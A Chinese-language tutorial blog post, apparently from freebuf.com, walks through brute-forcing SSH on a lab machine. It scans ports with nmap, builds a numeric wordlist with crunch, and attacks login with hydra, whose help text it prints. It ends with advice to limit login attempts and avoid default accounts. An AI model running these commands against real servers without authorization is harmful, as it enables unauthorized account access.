网站攻击之暴力破解 – 作者:无情剑客Burning

声明:谢绝一切形式的转载,禁止用作非法目的。

  工具

nmap和hydra(Kali Linux自带) nmap 是扫描工具 hydra 暴力破解工具

  第一步 扫描

nmap在网络扫描,漏洞发现等收集信息方面有举足轻重的地位。后续会专门讲解nmap的使用,这个工具让我对网络有了更进一步的认识。 这里进行最简单的扫描,查看被攻击的机器开放的端口。 nmap 192.168.1.103 在这里插入图片描述从上图中可以看出ssh是开启的

  第二步 暴力破解

暴力破解,自然离不开字典文件,如何生成字典,网上有很多的工具,当然也可以利用kali自带的字典。

生成字典

在Linux下,使用比较多的是crunch。crunch是一种创建密码字典工具,该字典通常用于暴力破解。使用Crunch工具生成的密码可以发送到终端、文件或另一个程序。

 
  1. crunch [minimum length] [maximum length] [character set] [options]

生成密码列表的最小长度为4,最大长度为6,并使用0123456789为字符集,可通过下面的命令生成字典文件:

 
  1. crunch 4 6 0123456789 -o passwd.txt

破解ssh

使用下面的命令就可以对开启ssh服务的机器进行攻击,这种攻击足矣让很多服务器沦陷。可根据需要将相应的用户名、密码改为相应的字典文件。

 
  1. hydra -l burning -p 123456 -s 22 192.168.1.103 ssh

hydra使用的参数:

 
  1. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  2. Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]
  3. Options:
  4. -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
  5. -p PASS or -P FILE try password PASS, or load several passwords from FILE
  6. -C FILE colon separated "login:pass" format, instead of -L/-P options
  7. -M FILE list of servers to attack, one entry per line, ':' to specify port
  8. -t TASKS run TASKS number of connects in parallel per target (default: 16)
  9. -U service module usage details
  10. -h more command line options (COMPLETE HELP)
  11. server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  12. service the service to crack (see below for supported protocols)
  13. OPT some service modules support additional input (-U for module help)

攻击成功后的效果如下所示,这证明帐号密码都是正确的。 在这里插入图片描述

  SSH

SSH 为 Secure Shell 的缩写,由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有UNIX平台—包括HP-UX、Linux、AIX、Solaris、Digital UNIX、Irix,以及其他平台,都可运行SSH。

  写在最后

对于网站的ssh服务,需要谨慎开启。虽然方便了远程工作,但是也为黑客破解网站提供了一个很好的入口,有很多的网站,ssh使用默认的账户名,那破解难度又下降了一个级别。因此,如果一定要开启服务,帐号密码要合理设置。

原则上,只要有足够大的硬盘空间,就能够破解任意的帐号密码。所以,有必要对用户登陆次数进行限制。

  

 

来源:freebuf.com 2020-08-07 23:56:12 by: 无情剑客Burning

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论